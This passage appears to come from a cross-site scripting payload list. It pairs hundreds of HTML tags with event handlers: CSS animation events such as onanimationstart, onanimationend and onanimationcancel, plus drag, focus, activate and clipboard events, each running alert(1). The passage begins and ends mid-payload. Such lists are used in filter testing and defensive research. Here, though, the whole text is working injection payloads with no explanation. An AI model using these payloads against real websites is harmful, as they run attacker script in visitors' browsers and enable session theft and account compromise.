x;}</style><select id=x style="position:absolute;" onanimationcancel="alert(1)"></select> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><shadow id=x style="position:absolute;" onanimationcancel="alert(1)"></shadow> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><slot id=x style="position:absolute;" onanimationcancel="alert(1)"></slot> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><small id=x style="position:absolute;" onanimationcancel="alert(1)"></small> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><source id=x style="position:absolute;" onanimationcancel="alert(1)"></source> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><spacer id=x style="position:absolute;" onanimationcancel="alert(1)"></spacer> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><span id=x style="position:absolute;" onanimationcancel="alert(1)"></span> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strike id=x style="position:absolute;" onanimationcancel="alert(1)"></strike> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strong id=x style="position:absolute;" onanimationcancel="alert(1)"></strong> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><style id=x style="position:absolute;" onanimationcancel="alert(1)"></style> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sub id=x style="position:absolute;" onanimationcancel="alert(1)"></sub> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><summary id=x style="position:absolute;" onanimationcancel="alert(1)"></summary> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style="position:absolute;" onanimationcancel="alert(1)"></sup> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><svg id=x style="position:absolute;" onanimationcancel="alert(1)"></svg> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><table id=x style="position:absolute;" onanimationcancel="alert(1)"></table> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tbody id=x style="position:absolute;" onanimationcancel="alert(1)"></tbody> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><td id=x style="position:absolute;" onanimationcancel="alert(1)"></td> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><template id=x style="position:absolute;" onanimationcancel="alert(1)"></template> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><textarea id=x style="position:absolute;" onanimationcancel="alert(1)"></textarea> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tfoot id=x style="position:absolute;" onanimationcancel="alert(1)"></tfoot> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><th id=x style="position:absolute;" onanimationcancel="alert(1)"></th> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><thead id=x style="position:absolute;" onanimationcancel="alert(1)"></thead> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><time id=x style="position:absolute;" onanimationcancel="alert(1)"></time> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><title id=x style="position:absolute;" onanimationcancel="alert(1)"></title> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tr id=x style="position:absolute;" onanimationcancel="alert(1)"></tr> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><track id=x style="position:absolute;" onanimationcancel="alert(1)"></track> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tt id=x style="position:absolute;" onanimationcancel="alert(1)"></tt> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><u id=x style="position:absolute;" onanimationcancel="alert(1)"></u> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style="position:absolute;" onanimationcancel="alert(1)"></ul> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><var id=x style="position:absolute;" onanimationcancel="alert(1)"></var> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><video id=x style="position:absolute;" onanimationcancel="alert(1)"></video> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><wbr id=x style="position:absolute;" onanimationcancel="alert(1)"></wbr> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xmp id=x style="position:absolute;" onanimationcancel="alert(1)"></xmp> <style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a> <style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a> <style>@keyframes x{}</style><abbr style="animation-name:x" onanimationend="alert(1)"></abbr> <style>@keyframes x{}</style><abbr style="animation-name:x" onanimationstart="alert(1)"></abbr> <style>@keyframes x{}</style><acronym style="animation-name:x" onanimationend="alert(1)"></acronym> <style>@keyframes x{}</style><acronym style="animation-name:x" onanimationstart="alert(1)"></acronym> <style>@keyframes x{}</style><address style="animation-name:x" onanimationend="alert(1)"></address> <style>@keyframes x{}</style><address style="animation-name:x" onanimationstart="alert(1)"></address> <style>@keyframes x{}</style><applet style="animation-name:x" onanimationend="alert(1)"></applet> <style>@keyframes x{}</style><applet style="animation-name:x" onanimationstart="alert(1)"></applet> <style>@keyframes x{}</style><area style="animation-name:x" onanimationend="alert(1)"></area> <style>@keyframes x{}</style><area style="animation-name:x" onanimationstart="alert(1)"></area> <style>@keyframes x{}</style><article style="animation-name:x" onanimationend="alert(1)"></article> <style>@keyframes x{}</style><article style="animation-name:x" onanimationstart="alert(1)"></article> <style>@keyframes x{}</style><aside style="animation-name:x" onanimationend="alert(1)"></aside> <style>@keyframes x{}</style><aside style="animation-name:x" onanimationstart="alert(1)"></aside> <style>@keyframes x{}</style><audio style="animation-name:x" onanimationend="alert(1)"></audio> <style>@keyframes x{}</style><audio style="animation-name:x" onanimationstart="alert(1)"></audio> <style>@keyframes x{}</style><b style="animation-name:x" onanimationend="alert(1)"></b> <style>@keyframes x{}</style><b style="animation-name:x" onanimationstart="alert(1)"></b> <style>@keyframes x{}</style><base style="animation-name:x" onanimationend="alert(1)"></base> <style>@keyframes x{}</style><base style="animation-name:x" onanimationstart="alert(1)"></base> <style>@keyframes x{}</style><basefont style="animation-name:x" onanimationend="alert(1)"></basefont> <style>@keyframes x{}</style><basefont style="animation-name:x" onanimationstart="alert(1)"></basefont> <style>@keyframes x{}</style><bdi style="animation-name:x" onanimationend="alert(1)"></bdi> <style>@keyframes x{}</style><bdi style="animation-name:x" onanimationstart="alert(1)"></bdi> <style>@keyframes x{}</style><bdo style="animation-name:x" onanimationend="alert(1)"></bdo> <style>@keyframes x{}</style><bdo style="animation-name:x" onanimationstart="alert(1)"></bdo> <style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationend="alert(1)"></bgsound> <style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationstart="alert(1)"></bgsound> <style>@keyframes x{}</style><big style="animation-name:x" onanimationend="alert(1)"></big> <style>@keyframes x{}</style><big style="animation-name:x" onanimationstart="alert(1)"></big> <style>@keyframes x{}</style><blink style="animation-name:x" onanimationend="alert(1)"></blink> <style>@keyframes x{}</style><blink style="animation-name:x" onanimationstart="alert(1)"></blink> <style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationend="alert(1)"></blockquote> <style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationstart="alert(1)"></blockquote> <style>@keyframes x{}</style><body style="animation-name:x" onanimationend="alert(1)"></body> <style>@keyframes x{}</style><body style="animation-name:x" onanimationstart="alert(1)"></body> <style>@keyframes x{}</style><br style="animation-name:x" onanimationend="alert(1)"></br> <style>@keyframes x{}</style><br style="animation-name:x" onanimationstart="alert(1)"></br> <style>@keyframes x{}</style><button style="animation-name:x" onanimationend="alert(1)"></button> <style>@keyframes x{}</style><button style="animation-name:x" onanimationstart="alert(1)"></button> <style>@keyframes x{}</style><canvas style="animation-name:x" onanimationend="alert(1)"></canvas> <style>@keyframes x{}</style><canvas style="animation-name:x" onanimationstart="alert(1)"></canvas> <style>@keyframes x{}</style><caption style="animation-name:x" onanimationend="alert(1)"></caption> <style>@keyframes x{}</style><caption style="animation-name:x" onanimationstart="alert(1)"></caption> <style>@keyframes x{}</style><center style="animation-name:x" onanimationend="alert(1)"></center> <style>@keyframes x{}</style><center style="animation-name:x" onanimationstart="alert(1)"></center> <style>@keyframes x{}</style><cite style="animation-name:x" onanimationend="alert(1)"></cite> <style>@keyframes x{}</style><cite style="animation-name:x" onanimationstart="alert(1)"></cite> <style>@keyframes x{}</style><code style="animation-name:x" onanimationend="alert(1)"></code> <style>@keyframes x{}</style><code style="animation-name:x" onanimationstart="alert(1)"></code> <style>@keyframes x{}</style><col style="animation-name:x" onanimationend="alert(1)"></col> <style>@keyframes x{}</style><col style="animation-name:x" onanimationstart="alert(1)"></col> <style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationend="alert(1)"></colgroup> <style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationstart="alert(1)"></colgroup> <style>@keyframes x{}</style><command style="animation-name:x" onanimationend="alert(1)"></command> <style>@keyframes x{}</style><command style="animation-name:x" onanimationstart="alert(1)"></command> <style>@keyframes x{}</style><content style="animation-name:x" onanimationend="alert(1)"></content> <style>@keyframes x{}</style><content style="animation-name:x" onanimationstart="alert(1)"></content> <style>@keyframes x{}</style><data style="animation-name:x" onanimationend="alert(1)"></data> <style>@keyframes x{}</style><data style="animation-name:x" onanimationstart="alert(1)"></data> <style>@keyframes x{}</style><datalist style="animation-name:x" onanimationend="alert(1)"></datalist> <style>@keyframes x{}</style><datalist style="animation-name:x" onanimationstart="alert(1)"></datalist> <style>@keyframes x{}</style><dd style="animation-name:x" onanimationend="alert(1)"></dd> <style>@keyframes x{}</style><dd style="animation-name:x" onanimationstart="alert(1)"></dd> <style>@keyframes x{}</style><del style="animation-name:x" onanimationend="alert(1)"></del> <style>@keyframes x{}</style><del style="animation-name:x" onanimationstart="alert(1)"></del> <style>@keyframes x{}</style><details style="animation-name:x" onanimationend="alert(1)"></details> <style>@keyframes x{}</style><details style="animation-name:x" onanimationstart="alert(1)"></details> <style>@keyframes x{}</style><dfn style="animation-name:x" onanimationend="alert(1)"></dfn> <style>@keyframes x{}</style><dfn style="animation-name:x" onanimationstart="alert(1)"></dfn> <style>@keyframes x{}</style><dialog style="animation-name:x" onanimationend="alert(1)"></dialog> <style>@keyframes x{}</style><dialog style="animation-name:x" onanimationstart="alert(1)"></dialog> <style>@keyframes x{}</style><dir style="animation-name:x" onanimationend="alert(1)"></dir> <style>@keyframes x{}</style><dir style="animation-name:x" onanimationstart="alert(1)"></dir> <style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div> <style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div> <style>@keyframes x{}</style><dl style="animation-name:x" onanimationend="alert(1)"></dl> <style>@keyframes x{}</style><dl style="animation-name:x" onanimationstart="alert(1)"></dl> <style>@keyframes x{}</style><dt style="animation-name:x" onanimationend="alert(1)"></dt> <style>@keyframes x{}</style><dt style="animation-name:x" onanimationstart="alert(1)"></dt> <style>@keyframes x{}</style><element style="animation-name:x" onanimationend="alert(1)"></element> <style>@keyframes x{}</style><element style="animation-name:x" onanimationstart="alert(1)"></element> <style>@keyframes x{}</style><em style="animation-name:x" onanimationend="alert(1)"></em> <style>@keyframes x{}</style><em style="animation-name:x" onanimationstart="alert(1)"></em> <style>@keyframes x{}</style><embed style="animation-name:x" onanimationend="alert(1)"></embed> <style>@keyframes x{}</style><embed style="animation-name:x" onanimationstart="alert(1)"></embed> <style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationend="alert(1)"></fieldset> <style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationstart="alert(1)"></fieldset> <style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationend="alert(1)"></figcaption> <style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationstart="alert(1)"></figcaption> <style>@keyframes x{}</style><figure style="animation-name:x" onanimationend="alert(1)"></figure> <style>@keyframes x{}</style><figure style="animation-name:x" onanimationstart="alert(1)"></figure> <style>@keyframes x{}</style><font style="animation-name:x" onanimationend="alert(1)"></font> <style>@keyframes x{}</style><font style="animation-name:x" onanimationstart="alert(1)"></font> <style>@keyframes x{}</style><footer style="animation-name:x" onanimationend="alert(1)"></footer> <style>@keyframes x{}</style><footer style="animation-name:x" onanimationstart="alert(1)"></footer> <style>@keyframes x{}</style><form style="animation-name:x" onanimationend="alert(1)"></form> <style>@keyframes x{}</style><form style="animation-name:x" onanimationstart="alert(1)"></form> <style>@keyframes x{}</style><frame style="animation-name:x" onanimationend="alert(1)"></frame> <style>@keyframes x{}</style><frame style="animation-name:x" onanimationstart="alert(1)"></frame> <style>@keyframes x{}</style><frameset style="animation-name:x" onanimationend="alert(1)"></frameset> <style>@keyframes x{}</style><frameset style="animation-name:x" onanimationstart="alert(1)"></frameset> <style>@keyframes x{}</style><h1 style="animation-name:x" onanimationend="alert(1)"></h1> <style>@keyframes x{}</style><h1 style="animation-name:x" onanimationstart="alert(1)"></h1> <style>@keyframes x{}</style><head style="animation-name:x" onanimationend="alert(1)"></head> <style>@keyframes x{}</style><head style="animation-name:x" onanimationstart="alert(1)"></head> <style>@keyframes x{}</style><header style="animation-name:x" onanimationend="alert(1)"></header> <style>@keyframes x{}</style><header style="animation-name:x" onanimationstart="alert(1)"></header> <style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationend="alert(1)"></hgroup> <style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationstart="alert(1)"></hgroup> <style>@keyframes x{}</style><hr style="animation-name:x" onanimationend="alert(1)"></hr> <style>@keyframes x{}</style><hr style="animation-name:x" onanimationstart="alert(1)"></hr> <style>@keyframes x{}</style><html style="animation-name:x" onanimationend="alert(1)"></html> <style>@keyframes x{}</style><html style="animation-name:x" onanimationstart="alert(1)"></html> <style>@keyframes x{}</style><i style="animation-name:x" onanimationend="alert(1)"></i> <style>@keyframes x{}</style><i style="animation-name:x" onanimationstart="alert(1)"></i> <style>@keyframes x{}</style><iframe style="animation-name:x" onanimationend="alert(1)"></iframe> <style>@keyframes x{}</style><iframe style="animation-name:x" onanimationstart="alert(1)"></iframe> <style>@keyframes x{}</style><image style="animation-name:x" onanimationend="alert(1)"></image> <style>@keyframes x{}</style><image style="animation-name:x" onanimationstart="alert(1)"></image> <style>@keyframes x{}</style><img style="animation-name:x" onanimationend="alert(1)"></img> <style>@keyframes x{}</style><img style="animation-name:x" onanimationstart="alert(1)"></img> <style>@keyframes x{}</style><input style="animation-name:x" onanimationend="alert(1)"></input> <style>@keyframes x{}</style><input style="animation-name:x" onanimationstart="alert(1)"></input> <style>@keyframes x{}</style><ins style="animation-name:x" onanimationend="alert(1)"></ins> <style>@keyframes x{}</style><ins style="animation-name:x" onanimationstart="alert(1)"></ins> <style>@keyframes x{}</style><isindex style="animation-name:x" onanimationend="alert(1)"></isindex> <style>@keyframes x{}</style><isindex style="animation-name:x" onanimationstart="alert(1)"></isindex> <style>@keyframes x{}</style><kbd style="animation-name:x" onanimationend="alert(1)"></kbd> <style>@keyframes x{}</style><kbd style="animation-name:x" onanimationstart="alert(1)"></kbd> <style>@keyframes x{}</style><keygen style="animation-name:x" onanimationend="alert(1)"></keygen> <style>@keyframes x{}</style><keygen style="animation-name:x" onanimationstart="alert(1)"></keygen> <style>@keyframes x{}</style><label style="animation-name:x" onanimationend="alert(1)"></label> <style>@keyframes x{}</style><label style="animation-name:x" onanimationstart="alert(1)"></label> <style>@keyframes x{}</style><legend style="animation-name:x" onanimationend="alert(1)"></legend> <style>@keyframes x{}</style><legend style="animation-name:x" onanimationstart="alert(1)"></legend> <style>@keyframes x{}</style><li style="animation-name:x" onanimationend="alert(1)"></li> <style>@keyframes x{}</style><li style="animation-name:x" onanimationstart="alert(1)"></li> <style>@keyframes x{}</style><link style="animation-name:x" onanimationend="alert(1)"></link> <style>@keyframes x{}</style><link style="animation-name:x" onanimationstart="alert(1)"></link> <style>@keyframes x{}</style><listing style="animation-name:x" onanimationend="alert(1)"></listing> <style>@keyframes x{}</style><listing style="animation-name:x" onanimationstart="alert(1)"></listing> <style>@keyframes x{}</style><main style="animation-name:x" onanimationend="alert(1)"></main> <style>@keyframes x{}</style><main style="animation-name:x" onanimationstart="alert(1)"></main> <style>@keyframes x{}</style><map style="animation-name:x" onanimationend="alert(1)"></map> <style>@keyframes x{}</style><map style="animation-name:x" onanimationstart="alert(1)"></map> <style>@keyframes x{}</style><mark style="animation-name:x" onanimationend="alert(1)"></mark> <style>@keyframes x{}</style><mark style="animation-name:x" onanimationstart="alert(1)"></mark> <style>@keyframes x{}</style><marquee style="animation-name:x" onanimationend="alert(1)"></marquee> <style>@keyframes x{}</style><marquee style="animation-name:x" onanimationstart="alert(1)"></marquee> <style>@keyframes x{}</style><menu style="animation-name:x" onanimationend="alert(1)"></menu> <style>@keyframes x{}</style><menu style="animation-name:x" onanimationstart="alert(1)"></menu> <style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationend="alert(1)"></menuitem> <style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationstart="alert(1)"></menuitem> <style>@keyframes x{}</style><meta style="animation-name:x" onanimationend="alert(1)"></meta> <style>@keyframes x{}</style><meta style="animation-name:x" onanimationstart="alert(1)"></meta> <style>@keyframes x{}</style><meter style="animation-name:x" onanimationend="alert(1)"></meter> <style>@keyframes x{}</style><meter style="animation-name:x" onanimationstart="alert(1)"></meter> <style>@keyframes x{}</style><multicol style="animation-name:x" onanimationend="alert(1)"></multicol> <style>@keyframes x{}</style><multicol style="animation-name:x" onanimationstart="alert(1)"></multicol> <style>@keyframes x{}</style><nav style="animation-name:x" onanimationend="alert(1)"></nav> <style>@keyframes x{}</style><nav style="animation-name:x" onanimationstart="alert(1)"></nav> <style>@keyframes x{}</style><nextid style="animation-name:x" onanimationend="alert(1)"></nextid> <style>@keyframes x{}</style><nextid style="animation-name:x" onanimationstart="alert(1)"></nextid> <style>@keyframes x{}</style><nobr style="animation-name:x" onanimationend="alert(1)"></nobr> <style>@keyframes x{}</style><nobr style="animation-name:x" onanimationstart="alert(1)"></nobr> <style>@keyframes x{}</style><noembed style="animation-name:x" onanimationend="alert(1)"></noembed> <style>@keyframes x{}</style><noembed style="animation-name:x" onanimationstart="alert(1)"></noembed> <style>@keyframes x{}</style><noframes style="animation-name:x" onanimationend="alert(1)"></noframes> <style>@keyframes x{}</style><noframes style="animation-name:x" onanimationstart="alert(1)"></noframes> <style>@keyframes x{}</style><noscript style="animation-name:x" onanimationend="alert(1)"></noscript> <style>@keyframes x{}</style><noscript style="animation-name:x" onanimationstart="alert(1)"></noscript> <style>@keyframes x{}</style><object style="animation-name:x" onanimationend="alert(1)"></object> <style>@keyframes x{}</style><object style="animation-name:x" onanimationstart="alert(1)"></object> <style>@keyframes x{}</style><ol style="animation-name:x" onanimationend="alert(1)"></ol> <style>@keyframes x{}</style><ol style="animation-name:x" onanimationstart="alert(1)"></ol> <style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationend="alert(1)"></optgroup> <style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationstart="alert(1)"></optgroup> <style>@keyframes x{}</style><option style="animation-name:x" onanimationend="alert(1)"></option> <style>@keyframes x{}</style><option style="animation-name:x" onanimationstart="alert(1)"></option> <style>@keyframes x{}</style><output style="animation-name:x" onanimationend="alert(1)"></output> <style>@keyframes x{}</style><output style="animation-name:x" onanimationstart="alert(1)"></output> <style>@keyframes x{}</style><p style="animation-name:x" onanimationend="alert(1)"></p> <style>@keyframes x{}</style><p style="animation-name:x" onanimationstart="alert(1)"></p> <style>@keyframes x{}</style><param style="animation-name:x" onanimationend="alert(1)"></param> <style>@keyframes x{}</style><param style="animation-name:x" onanimationstart="alert(1)"></param> <style>@keyframes x{}</style><picture style="animation-name:x" onanimationend="alert(1)"></picture> <style>@keyframes x{}</style><picture style="animation-name:x" onanimationstart="alert(1)"></picture> <style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationend="alert(1)"></plaintext> <style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationstart="alert(1)"></plaintext> <style>@keyframes x{}</style><pre style="animation-name:x" onanimationend="alert(1)"></pre> <style>@keyframes x{}</style><pre style="animation-name:x" onanimationstart="alert(1)"></pre> <style>@keyframes x{}</style><progress style="animation-name:x" onanimationend="alert(1)"></progress> <style>@keyframes x{}</style><progress style="animation-name:x" onanimationstart="alert(1)"></progress> <style>@keyframes x{}</style><q style="animation-name:x" onanimationend="alert(1)"></q> <style>@keyframes x{}</style><q style="animation-name:x" onanimationstart="alert(1)"></q> <style>@keyframes x{}</style><rb style="animation-name:x" onanimationend="alert(1)"></rb> <style>@keyframes x{}</style><rb style="animation-name:x" onanimationstart="alert(1)"></rb> <style>@keyframes x{}</style><rp style="animation-name:x" onanimationend="alert(1)"></rp> <style>@keyframes x{}</style><rp style="animation-name:x" onanimationstart="alert(1)"></rp> <style>@keyframes x{}</style><rt style="animation-name:x" onanimationend="alert(1)"></rt> <style>@keyframes x{}</style><rt style="animation-name:x" onanimationstart="alert(1)"></rt> <style>@keyframes x{}</style><rtc style="animation-name:x" onanimationend="alert(1)"></rtc> <style>@keyframes x{}</style><rtc style="animation-name:x" onanimationstart="alert(1)"></rtc> <style>@keyframes x{}</style><ruby style="animation-name:x" onanimationend="alert(1)"></ruby> <style>@keyframes x{}</style><ruby style="animation-name:x" onanimationstart="alert(1)"></ruby> <style>@keyframes x{}</style><s style="animation-name:x" onanimationend="alert(1)"></s> <style>@keyframes x{}</style><s style="animation-name:x" onanimationstart="alert(1)"></s> <style>@keyframes x{}</style><samp style="animation-name:x" onanimationend="alert(1)"></samp> <style>@keyframes x{}</style><samp style="animation-name:x" onanimationstart="alert(1)"></samp> <style>@keyframes x{}</style><script style="animation-name:x" onanimationend="alert(1)"></script> <style>@keyframes x{}</style><script style="animation-name:x" onanimationstart="alert(1)"></script> <style>@keyframes x{}</style><section style="animation-name:x" onanimationend="alert(1)"></section> <style>@keyframes x{}</style><section style="animation-name:x" onanimationstart="alert(1)"></section> <style>@keyframes x{}</style><select style="animation-name:x" onanimationend="alert(1)"></select> <style>@keyframes x{}</style><select style="animation-name:x" onanimationstart="alert(1)"></select> <style>@keyframes x{}</style><shadow style="animation-name:x" onanimationend="alert(1)"></shadow> <style>@keyframes x{}</style><shadow style="animation-name:x" onanimationstart="alert(1)"></shadow> <style>@keyframes x{}</style><slot style="animation-name:x" onanimationend="alert(1)"></slot> <style>@keyframes x{}</style><slot style="animation-name:x" onanimationstart="alert(1)"></slot> <style>@keyframes x{}</style><small style="animation-name:x" onanimationend="alert(1)"></small> <style>@keyframes x{}</style><small style="animation-name:x" onanimationstart="alert(1)"></small> <style>@keyframes x{}</style><source style="animation-name:x" onanimationend="alert(1)"></source> <style>@keyframes x{}</style><source style="animation-name:x" onanimationstart="alert(1)"></source> <style>@keyframes x{}</style><spacer style="animation-name:x" onanimationend="alert(1)"></spacer> <style>@keyframes x{}</style><spacer style="animation-name:x" onanimationstart="alert(1)"></spacer> <style>@keyframes x{}</style><span style="animation-name:x" onanimationend="alert(1)"></span> <style>@keyframes x{}</style><span style="animation-name:x" onanimationstart="alert(1)"></span> <style>@keyframes x{}</style><strike style="animation-name:x" onanimationend="alert(1)"></strike> <style>@keyframes x{}</style><strike style="animation-name:x" onanimationstart="alert(1)"></strike> <style>@keyframes x{}</style><strong style="animation-name:x" onanimationend="alert(1)"></strong> <style>@keyframes x{}</style><strong style="animation-name:x" onanimationstart="alert(1)"></strong> <style>@keyframes x{}</style><style style="animation-name:x" onanimationend="alert(1)"></style> <style>@keyframes x{}</style><style style="animation-name:x" onanimationstart="alert(1)"></style> <style>@keyframes x{}</style><sub style="animation-name:x" onanimationend="alert(1)"></sub> <style>@keyframes x{}</style><sub style="animation-name:x" onanimationstart="alert(1)"></sub> <style>@keyframes x{}</style><summary style="animation-name:x" onanimationend="alert(1)"></summary> <style>@keyframes x{}</style><summary style="animation-name:x" onanimationstart="alert(1)"></summary> <style>@keyframes x{}</style><sup style="animation-name:x" onanimationend="alert(1)"></sup> <style>@keyframes x{}</style><sup style="animation-name:x" onanimationstart="alert(1)"></sup> <style>@keyframes x{}</style><svg style="animation-name:x" onanimationend="alert(1)"></svg> <style>@keyframes x{}</style><svg style="animation-name:x" onanimationstart="alert(1)"></svg> <style>@keyframes x{}</style><table style="animation-name:x" onanimationend="alert(1)"></table> <style>@keyframes x{}</style><table style="animation-name:x" onanimationstart="alert(1)"></table> <style>@keyframes x{}</style><tbody style="animation-name:x" onanimationend="alert(1)"></tbody> <style>@keyframes x{}</style><tbody style="animation-name:x" onanimationstart="alert(1)"></tbody> <style>@keyframes x{}</style><td style="animation-name:x" onanimationend="alert(1)"></td> <style>@keyframes x{}</style><td style="animation-name:x" onanimationstart="alert(1)"></td> <style>@keyframes x{}</style><template style="animation-name:x" onanimationend="alert(1)"></template> <style>@keyframes x{}</style><template style="animation-name:x" onanimationstart="alert(1)"></template> <style>@keyframes x{}</style><textarea style="animation-name:x" onanimationend="alert(1)"></textarea> <style>@keyframes x{}</style><textarea style="animation-name:x" onanimationstart="alert(1)"></textarea> <style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationend="alert(1)"></tfoot> <style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationstart="alert(1)"></tfoot> <style>@keyframes x{}</style><th style="animation-name:x" onanimationend="alert(1)"></th> <style>@keyframes x{}</style><th style="animation-name:x" onanimationstart="alert(1)"></th> <style>@keyframes x{}</style><thead style="animation-name:x" onanimationend="alert(1)"></thead> <style>@keyframes x{}</style><thead style="animation-name:x" onanimationstart="alert(1)"></thead> <style>@keyframes x{}</style><time style="animation-name:x" onanimationend="alert(1)"></time> <style>@keyframes x{}</style><time style="animation-name:x" onanimationstart="alert(1)"></time> <style>@keyframes x{}</style><title style="animation-name:x" onanimationend="alert(1)"></title> <style>@keyframes x{}</style><title style="animation-name:x" onanimationstart="alert(1)"></title> <style>@keyframes x{}</style><tr style="animation-name:x" onanimationend="alert(1)"></tr> <style>@keyframes x{}</style><tr style="animation-name:x" onanimationstart="alert(1)"></tr> <style>@keyframes x{}</style><track style="animation-name:x" onanimationend="alert(1)"></track> <style>@keyframes x{}</style><track style="animation-name:x" onanimationstart="alert(1)"></track> <style>@keyframes x{}</style><tt style="animation-name:x" onanimationend="alert(1)"></tt> <style>@keyframes x{}</style><tt style="animation-name:x" onanimationstart="alert(1)"></tt> <style>@keyframes x{}</style><u style="animation-name:x" onanimationend="alert(1)"></u> <style>@keyframes x{}</style><u style="animation-name:x" onanimationstart="alert(1)"></u> <style>@keyframes x{}</style><ul style="animation-name:x" onanimationend="alert(1)"></ul> <style>@keyframes x{}</style><ul style="animation-name:x" onanimationstart="alert(1)"></ul> <style>@keyframes x{}</style><var style="animation-name:x" onanimationend="alert(1)"></var> <style>@keyframes x{}</style><var style="animation-name:x" onanimationstart="alert(1)"></var> <style>@keyframes x{}</style><video style="animation-name:x" onanimationend="alert(1)"></video> <style>@keyframes x{}</style><video style="animation-name:x" onanimationstart="alert(1)"></video> <style>@keyframes x{}</style><wbr style="animation-name:x" onanimationend="alert(1)"></wbr> <style>@keyframes x{}</style><wbr style="animation-name:x" onanimationstart="alert(1)"></wbr> <style>@keyframes x{}</style><xmp style="animation-name:x" onanimationend="alert(1)"></xmp> <style>@keyframes x{}</style><xmp style="animation-name:x" onanimationstart="alert(1)"></xmp> <style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss> <style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss> <sub draggable="true" ondrag="alert(1)">test</sub> <sub draggable="true" ondragend="alert(1)">test</sub> <sub draggable="true" ondragenter="alert(1)">test</sub> <sub draggable="true" ondragleave="alert(1)">test</sub> <sub draggable="true" ondragstart="alert(1)">test</sub> <sub id=x tabindex=1 onactivate=alert(1)></sub> <sub id=x tabindex=1 onbeforeactivate=alert(1)></sub> <sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus> <sub id=x tabindex=1 ondeactivate=alert(1)></sub><input id=y autofocus> <sub id=x tabindex=1 onfocus=alert(1)></sub> <sub id=x tabindex=1 onfocusin=alert(1)></sub> <sub onbeforecopy="alert(1)" contenteditable>test</sub> <sub onbeforecut="alert(1)" contenteditable>test</sub> <sub onbeforepaste="alert(1)" contenteditable>test</sub> <sub onblur=alert(1) tabindex=1 id=x></sub><input autofocus> <sub onclick="alert(1)">test</sub> <sub oncontextmenu="alert(1)">test</sub> <sub 